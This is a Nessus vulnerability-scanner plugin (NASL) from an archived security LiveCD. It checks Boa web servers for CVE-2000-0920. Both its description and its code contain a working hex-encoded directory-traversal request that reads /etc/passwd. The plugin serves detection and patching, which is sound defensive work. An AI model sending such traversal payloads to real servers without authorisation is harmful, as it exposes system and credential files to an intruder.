home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / httpd_boa.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  71 lines

  1. #
  2. # This script was written by Thomas Reinke <reinke@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10527);
  10.  script_bugtraq_id(1770);
  11.  script_version ("$Revision: 1.10 $");
  12.  script_cve_id("CVE-2000-0920");
  13.  
  14.  
  15.  name["english"] = "Boa file retrieval";
  16.  script_name(english:name["english"]);
  17.  
  18.  desc["english"] = "The remote Boa server
  19. allows an attacker to read arbitrary files
  20. on the remote web server,  prefixing the
  21. pathname of the file with hex-encoded
  22. ../../..
  23. Example:
  24.     GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd 
  25.  
  26. will return /etc/passwd.
  27.  
  28. Solution: upgrade to a later version of the
  29. server found at http://www.boa.org
  30.  
  31. Risk factor : High";
  32.  
  33.  script_description(english:desc["english"]);
  34.  
  35.  summary["english"] = "Boa file retrieval";
  36.  script_summary(english:summary["english"]);
  37.  
  38.  script_category(ACT_GATHER_INFO);
  39.  
  40.  
  41.  script_copyright(english:"This script is Copyright (C) 2000 Thomas Reinke");
  42.  family["english"] = "Remote file access";
  43.  family["francais"] = "AccΦs aux fichiers distants";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53. include("http_func.inc");
  54.  
  55. port = get_http_port(default:80);
  56.  
  57. if(get_port_state(port))
  58. {
  59.  soc = http_open_socket(port);
  60.  if(soc)
  61.  {
  62.   buf = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd");
  63.   buf = http_get(item:buf, port:port);
  64.   send(socket:soc, data:buf);
  65.   rep = http_recv(socket:soc);
  66.   if(("root:" >< rep) && ("Boa/" >< rep) )
  67.       security_hole(port);
  68.   http_close_socket(soc);
  69.  }
  70. }
  71.